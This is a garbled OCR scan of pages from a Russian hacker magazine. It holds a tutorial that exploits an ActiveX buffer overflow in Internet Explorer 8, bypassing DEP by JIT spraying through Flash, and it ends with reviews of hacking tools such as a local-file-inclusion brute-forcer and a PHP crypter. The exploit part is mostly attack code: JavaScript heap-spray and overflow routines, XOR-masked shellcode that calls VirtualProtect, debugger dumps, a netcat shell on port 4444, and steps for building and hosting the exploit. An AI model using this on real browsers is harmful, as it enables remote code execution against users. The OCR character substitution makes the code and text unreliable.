атомов и поиска места в таблице для хране- 
ния пары ключ-значение]. Это и многое дру- 
гое ты можешь более детально узнать в той 
же статье Диониса. 

//ріг — указатель на адрес строки 

с шеллкодом 

іі (еѵепРгеѵ < оббРгеѵ) { 
ріг = еѵепРгеѵ; 
іі ( еѵепРгеѵ+8+9 != осЫРгеѵ) 

{ //проверка 
геіигп 0; 

} 

} еізе { 

ріг = оскІРгеѵ; 

іі ( оскІРгеѵ+8 + 9 != еѵепРгеѵ) { 
геіигп 0; 



} 

} 

ріг = (ріг +1) * 8 ;/ /Возвращаем 

3 бита и делаем сдвиг на 8 : 

(ріг«3 ) +8 

Теперь, если к этому значению добавить ещё 
12, то это будет указатель на адрес строки. 
Время ЛТ Зргау! Для того чтобы это выпол- 
нить, достаточно открыть множество 5ѴѴЕ 
файлов. При этом первый файл загрузится, а 
остальные из кэша браузера пойдут. Тем не 
менее, надо помнить, что ЕІазЬ ставит огра- 
ничение на время работы скрипта. Обойти 
это можно, используя таймеры и события или 
интервал. После этого передаём управление 
в ІаѵаЗсгірі с адресом строки. 

іипсііоп радеЬоабЕх ( ) { 

ѵаг Ібг = пем Ьоасіег ( ) ; 
ѵаг игі = " з іі_зО . зѵ\гі " ; 

// файл с Л Т- шеллкодом 
ѵаг игІКед = пеѵ/ 

ІЖЬКедиезі (игі) ; 

Ібг . Іоаб (игІКед) ; 
сЪйІсІКеі = аббСЫІб ( Ібг ) ; 

} 

іипсііоп радеЬоаб(){ 

іог(ѵаг 2=0 ; 2<600 ; 2++ ) { 

радеЬоабЕх ( ) ; 



► 066 
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і©'№р": 



ДШѵеХ Шб-ЬзгсІ-ОЕР 5рЕой [АбіопБсгрІ 




Указатель на адрес шеллкода 



} //грузим 600 раз 
іс=іс + 1; 

МуТехбЕіеІбІ . бехб=іс + 

ЛТ зргауіпд, маіі бог 4 . 




ші С ЛѴѴІ N0 ОѴѴВІзузІе тЗ 2Ю МО . ехе - псаМ 4444 -!□! х| 



Міегозо?!: Ыіпйоыз ХР [Версия 5.1.26001 
СО Корпорация Майкрософт, 1985-200)1. 

С:чРосипепІ5 апД КссІіпдоЧЙДігііп >псаі -1 4444 
МісрогоРі Мігмітік ХР [Версия 5.1*26001 
СО Корпорация Майкрософт, 1985-2001. 

С:\БосипепІ5 апй 5е(;1іпдЕЧЙДігііп\Рабочин сто/і> и 



ІО (іс == 4) { 

//4 раза по 600 достаточно 
сіеагіпбегѵаі (Ібіпб) ; 
МуТехбЕіеІбІ . бехб = іс + 

" - бопе, саіііпд зріоіб. . . 
ЕхбегпаІІпбегбасе . саіі ( 

" ехріоіб", рбг) ; 
//передаем управление 

} 

} 

1бІпб=зебІпбегѵа1 (радеЬоаб, 3500 ) ; 
//запускаем процесс 

Теперь надо сформировать переполнение 
буфера. Суть проста: переписываем адрес 
возврата на адрес с ЛТ-шеллкодом, а далее, 
используя переполнение, добавляем в стек 
адрес строки с основным шеллкодом. Но 
тут возможна проблема: если адрес с ЛТ 
можно выбрать так, чтобы не было нулевых 
байтов или байтов не из А5СІ 1-строки , то 
адрес основного шеллкода уже не выбрать 
никак. Я придумал костыль, который поможет 
запихнуть адрес в стек — используем избы- 
точность. Разобьем четырехбайтный адрес 
на два. К примеру, у нас адрес 0x01 РР001 А. 
Второй и третий байт не проходят. Делаем из 
него два адреса: 0х606Р606 1 и 0x6 1 6Р606А. 
Переворачиваем последовательность и 
заносим в строку. Значения [0x60. .ОхбР] легко 
передаются. ЛТ шеллкод восстановит ори- 
гинальный адрес по формуле ((0х606Р6061 - 
0x60606060] «4]+(0х616Р606А-0х60606060)= 
0x01 РР001 А. Кроме того, исследуемая нами 
функция перескакивает ещё 8 байт после воз- 
врата, так как использует оператор геіп 8. Для 
того чтобы учесть это, заполним буфер так: 

СССС...2 60...ссссААААббббВВВВС- 

сссссссссссвввввввввввв 

ЕЗІ = АААА — указатель на 0, так 
же есть в ЛТ-зргау блоке 
КЕТ = ВВВВ — указатель на ЛТ 
шеллкод 



Шелл получен! 

СССС — старшие байты указателя 

ВВВБ — младшие байты указателя 

В таком случае мы учитываем 3 варианта 
исхода: геіп, геіп 4 и геіп 8. 

Шеллкод возьмет старшее значение, потом 
сдвинется в стеке на 12 байт и возьмет млад- 
шее. Осталось определить сам адрес воз- 
врата. Мои наблюдения показали, что если 
5ѴѴР файл с ЛТ-шеллкодом будет достаточно 
объемным, то расстояние между блоками 
будет слишком большим и есть значительная 
вероятность не угадать адрес. Чтобы блоки 
росли с одинаковым инкрементом, который 
можно предсказать, нужно соблюдать размер 
выделяемой памяти в пределах 0x1000 байт. 
Тогда каждый исполняемый блок будет отли- 
чаться от предыдущего ровно на 0x010000 
байт. Причем размер блока будет 0x1000 байт, 
после этого блока следуют неисполняемые 
блоки памяти. Дальнейшее зависит от А5І_Н, 
загруженности процесса и количества загру- 
жаемых блоков. В нашем примере идеальный 
адрес возврата есть 0x1 А1 А01 01 . Хотя блок 
начинается с 0х1А1А0000, мы указываем 
сдвиг, так как сначала идет кусок вводного 
кода, а затем наш ЛТ-шеллкод. После шелл- 
кода идет выводной код РІазЬ, остальное 
забито нулями. В итоге: 

ѵаг Ъиб=" " ; 

//Число в 16 -ну строку 

бшісбіоп бесітаІТоНех (б, 1 , габ) { 

ѵаг Ьех = ЫшпЪег (б) . боЗбгіпд (габ) ; 
ѵбіііе (Дех. ІепдбЬ. < 1) { 

Ьех = " 0 " + бех ; 

} 

гебигп Дех; 

} 

бшісбіоп ехр1оіб2 (багдебѴаІие) { 



іг Ъб=ипезсаре ( " %63 " ) ; 

// сссссс . . . 2 60 . . . сссссс 

ѵаг ѵа1ие=багдебѴа1ие ; 
ѵа1ие=бесітаІТоНех (ѵаіие, 8,16) ; 

// Разбиваем адрес на две 
четырехбайтные строки 

іг Ш= " %6 " +ѵа1ие . зиЪзбгіпд ( 0 , 1 ) ; 
іг 112= " %6 " +ѵа1ие . зиЪзбгіпд ( 1 , 2 ) ; 
іг Д2 1= " %6 " +ѵа1ие . зиЪзбгіпд (2,3) ; 
іг Д22= " %б " +ѵа1ие . зиЪзбгіпд (3 , 4 ) ; 
іг ДЗ 1= " %6 " +ѵа1ие . зиЪзбгіпд (4,5) ; 
іг Д32 = " %6 " +ѵа1ие . зиЪзбгіпд ( 5 , 6 ) ; 
ѵаг Д41 = " %6 " +ѵа1ие . зиЪзбгіпд (6,7) ; 
ѵаг Д42 = " %6 " +ѵа1ие . зиЪзбгіпд ( 7 , 8 ) ; 

// Две строки 

ѵаг ДідД=Д41+ДЗ 1+Д21+Д11 ; 

ѵаг Іом =Д42+Д32+Д22+Д12 ; 



// Буфер 

ѵбіііе (Ъиб . 1епдбД<2 60 ) Ъиб=Ъиб+Ъб; 



Ьиі+=ипезсаре ( " %0а%0а%1а%1а м ) ; 

// ЕЗІ — указатель на 0 
Ъиб+=" 1111" +ипезсаре ( "%01%01%1а%1а" ) ; 
// Адрес возврата = ОхІАІАОІОІ - 
ЛТ шеллкод 

Ъиб+=ипезсаре (ДідД) ; //іб геб 
Ъиб+=ипезсаре ( ДідД) ; //іб геб 4 
Ьиб+=ипезсаре (ДідД) ; //іб геб 8 (в 
ешзтбр.біі - геб 8) 

Ъиб+=ипезсаре ( Іоы) ; 

Ъиб+=ипезсаре ( Іоы) ; 

Ъиб+=ипезсаре ( Іоы) ; 



а1егб('Тгу те оп 0х' + бесітаІТоН 
ех ( багдебѴаІие ,8,16)+' :-)'); 

ѵиіп. ЗиЬшібТоЕхргезз (Ьиб) ? //атака 

} 



/ /Вызываем это из Флэша 
бипсбіоп ехріоіб (багдебѴаІие) { 
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► Об7 






взлом 




1Й1Й02ЙС 


50 


РІІ5Н ЕЙХ 


ж 


1Й1Й02ЙО 


ЗС 35 


СИР ЙІ_,35 




1Й1Й02ЙР 


90 


ИОР 




1Й1Й02В0 


90 


ИОР _ 




1Й1ЙѲ2В1 


ВЗ ЗС356С50 


мои ЕЙХ, 506С353С 




1Й1Й02В6 


90 


ИОР ’ 




1Й1Й02В7 


30 35 


СИР ЙІ_,35 




1Й1Й02В9 


В0 75 


ИОО Й1_, 75 




1Й1Й02ВВ 


90 


ИОР — 




1Й1Й02ВС 


30 35 


СИР Й1_,35 




1Й1Й02ВЕ 


В4 61 


ИОО ЙН,61 




1Й1Й02С0 


50 


РІІЗН ЕЙХ _ 




1Й1Й02С1 


ЗС 35 


СИР ЙІ_, 35 




1Й1Й02СЗ 


90 


ИОР 




1Й1ЙѲ2С4 


90 


ИОР _ 




1Й1Й02С5 


В8 30357274 


ИОО ЕЙХ,7472353С^ 




1Й1ЙѲ2СЙ 


90 


ИОР 




1Й1ЙѲ2СВ 


ЗС 35 


СИР ЙІ_, 35 




1Й1Й02СВ 


В0 56 


ИОО ЙІ_, 56 




1Й1Й02СР 


90 


ИОР 




1Й1Й02О0 


ЗС 35 


СИР ЙІ_,35 




1Й1Й02О2 


В4 69 


ИОО ЙН, 69 




1Й1Й02О4 


50 


РІІЗН ЕЙХ 


▼ 


I Іпм=35 ( 1 


Р 5Ч 






йь= 56 гоч 




▼ 


Йскіге** 


Нек сіипр 




поАпгсггП 



КедІ5*ег5 (РРШ 



ЕЙХ 74726956 М5СТР. 74726956 
ЕСХ 7С30441С к егп е 1 32 . 7С8Ѳ44 1 С 
ЕОХ 7С802650 кегпе 132. 7С802650 
ЕВХ 7С802654 кегпе 132. 7С802654 
ЕЗР 020ДЕРВС ЙЗСІІ ”0 ігЪиа ІРго 
ЕБР 66666666 
ЕЗІ 7С303533 кегпе 132. 7С303538 
ЕВ I 000003В9 

ЕІР 1Й1Й02О5 



С 0 ЕЗ 0023 
Р 1 С5 001В 
Й 0 55 0023 
20 05 0023 
5 0 Р5 003В 
Т 0 65 0000 
О 0 

О 0 ЬаегЕгг 

ЕРЬ 00240206 

5Т0 еГОР^У — ??? РРРР 00000000 01 
5Т1 епргу -??? РРРР 00000000 01 
5Т2 ег-ір^у 0.0 

5ТЗ епр*у 1.2976595335374733951 
5Т4 еЮрЪу — ??? РРРР 00000000 01 
5Т5 епр*у 1.9999999552965164131 
5Т6 епр^у Ѳ.Ѳ 



32Ьі* 0( РРРРРРРР) 
32Ы* 0( РРРРРРРР) 
32Ь I Ъ 0( РРРРРРРР) 

32ьи 0 ( рррррррр) 
32Ыг 7РРО5000С РРІ 

ши. 

0000Ѳ0Ѳ0 ЕВВ0В_51П 
( НО, НВ, НЕ, Й, ИЗ, РЕ 



00427000 

00427010 

00427020 

00427030 

Ѳ0427040 

0042705Ѳ 

00427060 

00427070 

00427080 

00427Ѳ90 



78 ОВ 29 331 
ЗР 04 0В 48 

79 76 С9 43 
38 76 1В ЕО 
ОР 49 30 ЗР 
РЙ 1Р Р7 ЙЕ 
70 ВР 30 РО 
1С 63 4Р 50 
ОР С0 ЙЗ 2В 
2Е 20 59 1В 



77 10 
ЕР 81 
07 ВЕ 
ВО В9 
70 42 
ЗС В7 
60 ЗР 
98 76 
7Р ВЗ 
Е6 ОВ 



76 Р2І 
90 ОВ 
05 СС! 
Е5 Р6 
СЗ 5Р 

77 ОВ 
4Р 1В 
07 С6 
33 03 
59 ОС 



25 62 
00 ІЙ 
15 13 
00 85 
РЗ ОС 
ЕЕ РВ 
94 Р9 
Й2 ІЙ 
СЙ 28 
ВО В1 



1 

?о 

6 

3 

4 
7 
2 

8” 



020ЙЕРС4 

020ЙЕРС8 

020ЙЕРСС 

020ЙЕРО0 

020ЙЕРО4 

020ЙЕРО8 

Ѳ20ЙЕРОС 

020ЙЕРЕ0 

020ЙЕРЕ4 

Гл-ч-лГіГ-Г-Г-Гі 



74726956 

506С6175 

00007463 

7С800000 

00000035 

00000035 

00000035 

00000035 

00000035 

63636363 



Оіг* 

и а I Р 

го*е 

с* . . 

. .Й! 

5.. 

5.. 

5.. 

5. . 

5.. 

сссс 






Пишем ЛТ шеллкод, особености РІІБН'а 



зеСТітеоиб ( ' ехр!оіб2 ( 1 +СагдебѴа1ие+ ' ) 1 , 5000) ; 



} 



/ / капельку подождем 



нас их только 3. Но эта проблема решается, если работать с регистром 
и его частями. Сначала 4 байта в регистр, причем второй младший 
байт будет ХОВом — 0x35. Затем меняем АІ_ и АН. 



ЛТ-5РКАѴ ШЕЛЛКОД 

Вернемся к собственно ЛТ-шеллкоду. Когда я начал над ним работать, 
всплыло как минимум три основных подводных камня. 

1. Старший байт не может быть больше 0х7Р. Иначе получается слишком 
большое число и, чтобы обработать его, в нашу ХОН строку добавляется 
ненужный код, который все испортит. Поэтому мы можем использовать 
значения от 0x00 до 0х7Р. 

2. Если в нашем шеллкоде будет сравнение, а потом оператор услов- 
ного перехода (Л N Е/Л Е, например], то надо держать X флаг неизмен- 
ным после сравнения и до оператора перехода. Но ведь мы можем 
вводить команды только группой по три байта, а затем маскировать 
ХОР. А ХОР мы маскируем оператором СМР, что, естественно, не 
способствует сохранности X флага. Чтобы решить эту проблему, нам 
нужно найти оператор с размером аргумента в один байт (значение 
ХОР), да так, чтобы он не влиял на X флаг и не переходил границ 0х7Е 
значением опкода. А00, 511В, ХОР, ОР, АШ и т.д. — все это не под- 
ходит. Если в результате выполнения операции регистр АЕ станет О, 
то установится X флаг. В итоге, единственной подходящей командой 
оказалась команда РЕІ5Н — ОхбА. Тогда пример сравнения и перехода 
будет выглядеть так: 

ОхІАІАОІІО : 803Е6Е СМР [ЕБІ], ’п' 

ОхІАІАОІІЗ : БАЗ 5 РІІЗН 35 

0х1А1А0115: 75ЕЕ ^п7. зЬоГІ 

3. Мы не можем работать полноценно с четырехбайтными значения- 
ми. К примеру, сделать РІІ5Н ОхАІ В 1 СЗС4. Ведь для этого нам надо 

5 контролируемых подряд байт, и ещё 6 байт для маскировки ХОР, а у 



ОхІАІАОІІО: 
0х1А1А0115 : 
0х1А1А0117 : 
ОхІАІАОІІа : 
ОхІАІАОІІс : 
ОхІАІАОІІЕ: 
0х1А1А0121: 



В80035В1А1 
ЗСЗ 5 
В063С4 
ЗСЗ 5 
В163СЗ 
ЗСЗ 5 

50 РІІЗН ЕАХ 



МОѴ ЕАХ, ОхАІВІЗ 500 

СМР АЬ , 35 

МОѴ АЬ, С 4 

СМР АЬ , 35 

МОѴ АН, С 4 

СМР АЬ , 35 



Учитывая эти три особенности, можно написать почти любой шеллкод. 
Пишем тот, что задумали. Полная версия на диске, здесь приведены 
лишь ключевые моменты. 



ОипсСіоп бипсХОКІ ( ) 

{ 

ѵаг з ІС= ( 0хЗс909090 л 0хЗс909090 л .. // начнем с ШР 



0х3с44ес83 /ч // 
адреса подальше 


3583ес443с 


зиЬ 


езр. 


44 ; уходим от 


0хЗс90С033 л 


// 


3533С0903с 


хог 


еах. 


еах 


0хЗс9030Ь0 л 


// 


35Ь030903с 


тоѵ 


АЬ, 


30 


0хЗс008Ьб4 л 


// 


3 5б48Ь003с 


тоѵ 


еах. 


бз : [еах] 


0хЗс0с408Ь /ч 


// 


358Ь400сЗс 


тоѵ 


еах. 


бз : [еах+С] 


0хЗс1с408Ь /ч 


// 


358Ь401сЗс 


тоѵ 


еах. 


бз : [еах+ІС] 


0хЗс08508Ь л 


// 


3 58Ь50083с 


ЫЕХТ: тоѵ есіх, [еах+08] 


0хЗс20788Ь л 

модуля 


// 


3 58Ь782 03с 


тоѵ 


ебі , 


[еах+20] ;имя 


0хЗс90008Ъ /ч 


// 


358Ь00903с 


тоѵ 


еах. 


[еах] 


ОхбабЬЗРЗО^ 
к? "кет" 


// 


35803РбЬба 


стр 


[есЗі] 


, ' к ' ; Первая буква 



► 068 



ХАКЕР 05 /136/ 10 




ризн 4Ѳ - 

СМР ЙІ_,35 

ризн і 

МОР 

смр ни 35 
ризн еоі«* 

СЯЫ_ ЕВХ 



СМР АІ_,35 
ОПР ЕОІ 
МОР 

СМР ЙІ_,35 

ттз 

ІМТЗ 

ІНТЗ 

СМР ЙІ_,50 

мои есх,5і 

СЯЫ_ 05Р7: 

имр іАіяа* 
мои ЁСХ/51 
сяіі_ аэбзі 

І_ЕАЦЕг 



.и 1Р1Я008Р 



[с] ОРУ - ІИгеасі 9 . ( 00 000 ГАС) 



ІЙ1Я03О7 


6А 40 


1Й1А03О9 


ЗС 35 


ІЙ1Я03ОВ 


бй 01 


ШЙОЗОО 


90 




ЗС 35 


1Й1Й03ЕѲ 


57 


ббщщ 


РРОЗ 




ЗС 35 


ійіГ 


РРЕ7 


1Й1А03Е? 


90 


1АІАѲЗЕ8 


ЗС 35 


1Й1Й03ЕЙ 


СС 


1А1Я03ЁВ 


СС 


1Й1А03ЕС 


СС 


1Й1ЙѲЗЕ0 


ЗС БѲ 


1Й1Я03ЁР 


89 00Й0ОЙ05 


1Й1Й03Р4 


Е8 871380ЕВ 


Ш1Я03Р9 


ѵ ЕЗ 03000000 


1Й1Й03РЁ 


$840 03 


Ш1Й0401 


Е8 0ЙЕ08ЕЕВ 


1О1Й0405 


С9 


1Й1Й040? 


СЗ 


ШІЙ04Ѳ8 


Ев 70РСРРРР 



Ітго=35 С 
йі_=0і 



05 ЕС 7 1 1 о 



Ѳ5ЕС7128 



05ЕС7138 



05ЕС7ЫЗ 



РѴѴЕ 



Веді-аЕег'Е (ГРУЗ 
00000001 

ЕСХ 82ѲАЕРЕ0 

ЕВХ 7С90Е4Р4 пиіН . К ІРа^5у***т€а ПВе* 
ЕВХ 7С30ІРО4 квгп^132.иіг^иаІРгоі;есг 

ЕЗР Ѳ2ѲЙРѲЗЗ 

ЕВР бббббб 66 

ЕЗІ 7С803538 кегле 132 і 7С803538 
ЕОІ Ѳ5ЕС70В8 



ІЙІА03ЕЗ 

Е5 0Ѳ23 згьи 
^СЗ 001В 32Ьі* 
«3 0023 32Ы* 
0340923 32Ыг. 



0(РРРРРРРР> 
0( РРРРРРРР) 
0( РРРРРРРР) 
01 РРРРРРРР} 



РЗ 32ьи 7РРО5000(РРР) 

ез 0008. гши_ 



90 90 90 90 90 90 90 90 90 90 90 90 90 
90 90 90 90 90 М ІЙ М ~~ “ I 
90 90 90 90 90 
90 90 90 9Ѳ 90 
90 90 90 90 90 
90 90 90 90 90 

11 Шеллкод из Метасплойта 

90 

99 90 90 90 90 90 90 90 90 90 90 90 90 



|м метогутар \ а 0 ІийЗшІ 


ІВДгевд 


Зіге- 




$еос іогѴ 


Сол 


Туре 


йосе^^ 


іли ж 


І0 5774000 

15372000 
В 5 880000 
§5881000 
І5В84Ѳ00 
§5006000 
§5СР7000 
В5СРЗѲ00 
к ВБОѲВ000 
Щъ 030000 
1Э5ЕО7000 


00001000 
0000 1000 
0000Е000 
00001000 
00303000 
00Ѳ82000 
000Р1000 
00001000 
00013000 
00019900 
00197000 


Ріа^! 

РІа^І 

РІа^І 

Ріа^І 

РІа^І 

РІа^І 

РІа^І 


'Тбага 
. ба* а 
.гссіаѣа 

.геіос 


\^а 

г\ 

Оаб 

Ре Г 


Рт іѵ 
Ргіѵ 
РігІѵ 
Імд 
ІП9 
Лм9 
4^9 

№ 

Іп\| 

РЛЯ 


РШ Си а: 
РЫ би а: 
РЫ 
Р 

Е 

Р 

РЫ Сор; 
РЫ Сор' 
Р 
Р 

РШ 


^ЕЕЕЕЕЕЕЕ 

ттттттт 

0 


00001000 








Рг IV 


КМЕ 




06Е210Ѳ0 

06Е22000 

Ѳ6Р210Ѳ0 


00С88009 

00001000 

0600Е0ѲѲ 

00001000 






3^ а< 


Рт Іѵ 
Ргіѵ 
Рг IV 
-ЕіІУ. 


ВІіГ 

РМ 13 и э: 

М 

В» в«э; 


РЫ 

РЫ _ 
РЫ 


820ЙР060 


042ЙА774 


. РС, » « 

\ 


г 

* чг 

к 



Делаем память с шеллкодом исполняемой 



0хЗс90еА75 л // 3575еА903с зпг збогб ЫЕХТ: 

0хЗс904747 л // 354747903с іпс ебі , іпс ебі ; два байта 
сдвиг — Шіісобе ж 

... II и так далее остальные три буквы 
... / / Найдя модуль по имени и его базовый адрес 
... // Получаем указатели на таблицы с именами и адресами 
функций 

0хЗс689090 л // 359090Ь83с шоѵ еах, Зс . . 

0хЗс900000 л // 350000903с 3500000 

0х3с90б360 /ч // 356063903с шоѵ аб, ' с ' 

0хЗс507464 /ч // 356474503с шоѵ аі , 'б' апб ризб - И с6\0\0" 

// заносим в стек по 4 байта 
"Ѵігб иаІР гобе сб\0\0" 

// затем ищем в списке имен данное имя, как нашли имя, 
смотрим с этим же индексом адрес функции, получаем 



0х3с5сс483 /ч // 
адресу шеллкод а 
0хЗс909058 Л // 
0хЗс08с483 Л // 
младшему адресу 
0x30699053^ // 
значения 
0хЗс906060 Л // 
0хЗс906061 л // 
0хЗс906065 л // 
0хЗс90с126^ // 
0x30906126^ // 
восстановили 
0хЗс04е0с1 Л // 
0хЗс90с2 03 Л // 
0хЗс903886 Л // 
указателю адрес 
0х3с08с7 83 /ч // 
байт 

0хЗс406а54 Л // 



3583с45с3с абб езр, 5с ; Возвращаемся к 

355890903с рор еах ; получаем старшие байты 
3583 с4 083с абб езр, 08 ; сдвигаемся к 

355а90б93с рор ебх ; получаем младшие 

356060903с 

356160903с 

356560903с заносим в регистр есх 0x60606060 
3526с1903с зиб еах, есх 

352661903с зиб ебх, есх ; младшие 

35с1е0043с збі еах, 4 ; теперь старшие 

3503 с2 903с абб еах, ебх ; ну и весь адрес 

358638903с шоѵ ебі , [еах] ; получаем по 
шеллкода 

3583с7083с абб ебі, 8 ; сдвигаемся на 8 
35546а403с ризб езр апб ризб 40 ; 



подготавливаем параметры. 0x40 — разрешить на чтение, 
запись и исполнение 

0хЗс90016а /ч // 356а01903с ризб 01 ; размер не имеет 
значения 

0х3сб36657 л // 355766633с вызываем функцию 

0хЗс90е766); // и финальный прыжок на основной шеллкод, 
уже исполняемый 
} 



бипсбіоп Ьоаб222(){ ѵаг гебі = бипсХОКІ ( ) ; } 

В комментариях ищи основной смысл, в опкодах же присутствует 
ещё выравнивание ІЧОР’ами и маскирование ХОВ’ов. Конечно, 
данный шеллкод можно вписать в меньшие размеры, но в данном 
случае значения это не имеет, главное — не набрать кода больше 
чем 0x1000 = 4000 байт. Наш шеллкод имеет размер около 800 байт, 
включая ІЧОР’ы, ХОР’ы и выравнивания Так что места ещё много. Вот 
такая история. На диске ты найдешь примеры других шеллкодов и 
пример эксплойта. К сожалению, мы не успели рассмотреть вариант 
с точным вычислением адреса ЛТ шеллкода, тем не менее, и данный 
вариант будет работать. На диске есть набор для генерации всего что 
понадобится для обхода защиты РЕР в ІЕ8, и вдобавок видео, как этим 
пользоваться. Вкратце суть следующая: 

1. Находим уязвимость. 

2. Генерируем в метасплойте шеллкод в формате регі. 

3. Сохраняем его, меня модификатор 'ту' на ‘оиг. 

3. Генерируем А5 файл: регі зЬеІІсосІедеп.рІ зЬе11сос1е_Л1е > ііі-зргау.аз 

4. Генерируем 5ѴѴР файл: азЗсотріІег -X 320 -У 300 -М І_оасІ 22 І ]\\.~ 
зргау.аз 

5. Собираем эксплойт, используя функции из статьи. Так, чтобы после 
адреса возврата находился адрес, передаваемый через Пазб. 

6. Закачиваем НТМб и 5ѴѴР на ѴѴЕВ сервер. 

Пожалуй, на этом трилогия про атаки на браузеры через АсГіѵеХ 
закончена. Надо заметить, что описанный здесь метод применим 
не только к ІЕ8, но и к другим браузерам. Аналогичный метод может 
использоваться в РОГ файлах, т 
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Маг і с я 884888 



А 



Х-Т00І.З 

ПРОГРАММЫ ДЛЯ ХАКЕРОВ 




ПРОГРАММА: иВпйе 

ОС: ѴѴІЫ00ѴѴ5 2000/2003/ХР/ѴІ5ТА/7 

АВТОР: [Х26]ѴОІ_АЫО 




Представляю твоему вниманию небольшую 
утилиту, позволяющую автоматизировать про- 
цесс проведения уязвимостей класса І_осаІ Рііе 
I псіисіе, отуже известного тебе по предыдущим 
выпускам ][ кодера. 

Итак, прога от [х26]ѴОІ_АЫО позволяет подбирать 
файлы наудаленной машине пословарю путем 
подстановки локального пути в заданную НТТР- 
переменную. 

Возможности проги впечатляют: 

• удобный ОІЛ; 

• поддержка НТТР5; 

• поддержка прокси (НТТР/НТТР5); 

• настройка авторедиректов; 

• возможность установки произвольных заго- 
ловков; 

• возможность установки задержки между 
попытками; 

• возможность установки максимального ска- 
чиваемого размера страницы; 

• 4 метода атаки (Оиегу 5іхіпд, СЕТ, РОСТ, 
СООКІЕ); 

• возможностьдобавления взапросдополни- 
тельных переменных; 

• макросы для подстановки имени файла; 

• 2 варианта проверки на наличие файла (по 
поиску заданной строки в странице и по изме- 
нению размера страницы); 

• режим атаки сразу нескольких сайтов; 

• редактор настроекдля атакуемых сайтов; 

• возможностьдетальной настройки каждого 
сайта в отдельности; 

• возможность загрузки списка атакуемых 
сайтов из файла; 

• автоматический парсингІІРЕ; 

• можно использовать сразу несколько словарей; 

• возможность кодирования значения в ІІгІ или 
Нех (для атаки через 50Е-инъекцию). 



Использовать утилиту очень просто. Допустим, 
если имеется ЬРІ вида ШрУ/зЕе.сот/іпсІех. 
рЬр?раде=пеѵѵ5&Іапд=[файл1%00 . то ста в ь 
следующие настройки: 

1. Целевой УРЬ: ЫірУ/зЕе.сот/іпсІех. 
рЬр?раде=пеѵѵ5 ; 

2 . Метод: 6ЕТ; 

3. Имя переменной: Іапд ; 

4 . Значение переменной: {5ТР}%00; 

5 . Способ индикации: по размеру страницы. 
Далее нажимай кнопку «Начать» и жди результа :) 
Словари для брута бери по ссылке: Шрз:// 
Іогит.апбсЬаЕгиДЬгеасІ49775.Ыпп[ . 

ПРОГРАММА: НТТРРЕО 

О С : ѴѴІ N йОѴѴБ 2000/2003/ХР/ 

ѴІ5ТА/7 

АВТОР: [Х26]ѴОІАЫО 

На очереди еще одна прога от Воланда — 
НПрВЕСІ. 

Прога позиционируется какзамена ІпеЮгаскза 
неимением некоторого нужного функционала в 
последней. 

Функционал утилиты следующий: 

• 0 111-интерфейс; 

• поддержка любых методов и любых заголовков 
запроса; 

• поддержка 55 Е; 

• поддержка прокси; 

• поддержка любых портов; 

• встроенный ИВЕ и Оесітаі кодировщики; 




использование ННрВЕСІ 

• индикация длины выделенного текста; 

• удобный конструктор, автоматизирующий 
написание запросов; 

• автоматический парсингЕІРЕна Нозі: и ло- 
кальный адрес; 

• автоматическая вставка длины Р05Т-данных 
(СопІепЫепдіЫ; 

• несколько предустановленных вариантов 
ЕІзег-АдепЕ 




трояны не пройдут! 

• пересылка любого количества файлов в НТТР- 
запросе; 

• автоопределение и задание произвольного 
МІМЕ-типа; 

• сохранение истории НТТР-запросов; 

• подсвечивание имен заголовков ответа 
сервера; 

• корректная обработка нулл-байта; 

• изменение размера шрифта для поля ввода 
запроса; 

• поисктекста в теле ответа с удобной подсвет- 
кой; 

• сохранениетела ответа в файл; 

• предпросмотртела ответа во встроенном 
браузере; 

• работа через .ЫЕТ Егатеѵѵогк > 2.0; 

Если утебя имеются какие-то предложения и 
пожелания по работе НирРЕО, направляй их 
прямо автору в тему на Античате ЬШрзУЛогит. 
апіісЬаЕгиДЬгеасІ121239.Ы:ітіЕ 

ПРОГРАММА: ѴѴШ00ѴѴ5иМІ-0СКЕК 
ОС: ѴѴІЫ00ѴѴ5 2000/2003/ХР/ 
ѴІ5ТА/7 
АВТОР: О^ЬУ 

Если ты знаком с трояном ѵѵіп.іоск, который 
для разблокировки ѴѴіпбоѵѵз просит отправить 
5М5 на номер NNNN1,™ наверняка знаешь, 
что от него очень и очень сложно избавиться 
(особенно с появлением последних версий этого 
«зверька»). 




Г 



/ ѵт 
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С:\0осипеп*5 апгі Зе<:<: іпдз\М4д>г г/изг/ІосаІ/Ып/регІ .ехе С:/р1оса1.р1 

II заде: С:/р1оса1.р1 -рх ргоху_и»*1 [~Ър ЬіпЛроіЧ ] [-<:рх (иппе 1_ргоху ] І-рисІ зесге 

*] 

Ехапріе: С:/р1оса1.р1 -рх Ь*1:р://5І*е .соп/ргоху/ргоху.ркр -Ьр 8080 

С:/р1оса1.р1 -рх ЬСІ;р://5ІСе .соп/ргоху/ргоху.рЪр -рисі рргохуразз 
С:/р1оса1.р1 -рх Ы<:р://зі(:е .соп/ргоху/ргоху -рЬр -*рх Ьі;<;р://1оса1Ьо5<: : 

8118 



ТТЯеЯЯН 1 НПР>5 Г 50СНЙ4/5 Ряэку Скаскёг ѵі ,0 



ИМ* Ііві Осѵ 



ТіпеоіД 



Ргащ саипі: 0 
СІккІвд^О 



й:0 Риисувди.Од. Дп ІСО МПЗ 



чекер проксеи 



ШеГаиІс Ъіпсі рог* 



запуск проксика 


ТЛе пате Ыіе ЛІе оп Ліе зегѵег: 




Мате Ліе пеѵѵ ЛІе: 


.ьл 


ЕпсгурЛоп кеу: со<Ш22 




Со! 




ѴѴеЬХакер.пеІ* 2 - 22 . ги 





РНР-криптор 



А 



л_ 



Специально для избавления отданной напасти 
мембер форума Асечки 0] Ріу и написал прогу 
ѴѴіпбоѵѵз ипіоскег. 

Прога может делать следующие полезные вещи: 

1. Разблокировать диспетчер задач (затем ты 
можешь выловить гада в диспетчере и убить 
процесс); 

2 . Разблокировать кнопку «Пуск»; 

3. Разблокировать панельзадач; 

4 . Открывать проводник; 

5 . Открывать ІЕ на странице антивируса ОгѴѴеЬ 
Сиге И: (и сразу начинать скачивание); 

6. Открывать командную строку; 

7 . Сделать все перечисленное одновременно 
кнопкой «Разблокировать все»; 

8. Просматривать запущенные процессы и 
нужные убивать; 

9 . Обработка некоторых комбинация горячих 
клавиш (если клавиатура будетзаблокирована 
трояном); 

10 . Разблокировка клавиатуры (два метода); 

11. Встроенное меню «Выполнить» (замена 
командной строки); 

12. Работа втрее; 

13 . Завершение работы *.зсгфайлов; 

14 . Исправление и восстановление файла Ьозіз. 
Использовать программу можно, к примеру, сле- 
дующим образом: скидываем ее на любой Сй/ 
0Ѵ0/ІІ5В носитель, предварительно переиме- 
